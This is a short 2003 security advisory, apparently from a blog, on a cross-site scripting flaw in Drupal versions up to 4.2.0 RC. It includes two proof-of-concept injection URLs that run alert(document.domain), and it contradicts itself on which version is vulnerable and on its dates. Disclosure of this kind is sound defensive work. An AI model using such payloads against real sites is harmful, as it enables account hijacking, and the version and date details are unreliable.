Drupal XSS Vulnerability (main page and sub pages)

20-7-2003

------------------------------------------------------ Drupal XSS Vulnerability (main page and sub pages) ------------------------------------------------------ Any kind of XSS attacks possibility. An attacker could access other users/admin drupal accounts. ------------------------------------------------------ About Drupal; ------------------------------------------------------ www.drupal.com Drupal is an open-source platform and content management system for building dynamic web sites offering a broad range of features and services including user administration, publishing workflow, discussion capabilities, news aggregation, metadata functionalities using controlled vocabularies and XML publishing for content sharing purposes. Equipped with a powerful blend of features and configurability, Drupal can support a diverse range of web projects ranging from personal weblogs to large community-driven sites. ------------------------------------------------------ Vulnerable; ------------------------------------------------------ TESTED; Drupal 4.2.0 RC NOT TESTED - %90 VULNERABLE; Drupal 4.1.0 Drupal 4.0.0 Drupal 3.0.2 Drupal 3.0.1 Drupal 3.0.0 Drupal 2.0.0 Drupal 1.0.0 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ Drupal 4.2.0 RC ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Vendor replied and fixed quickly. ------------------------------------------------------ Solution & Patches; ------------------------------------------------------ download : http://ferruh.mavituna.com/opensource/patches/drupalpatch.zip xss-cvs.patch xss-4.2.0-rc.patch xss-4.1.0.patch [All files provided by Vendor] ------------------------------------------------------ Exploit Code; ------------------------------------------------------ http://[victim]/xxx"][script]alert(document.domain)]/script][" ------------------------------------------------------ Exploit - 2; ------------------------------------------------------ http://[victim]/node/view/666"><script>alert(document.domain)</script> Replace "<>","[]" ------------------------------------------------------ History; ------------------------------------------------------ 30.05.2003 - Discovered 03.05.2003 - Vendor Informed 03.05.2003 - Fixed by Vendor

Recent Blog Posts

See all of the blog posts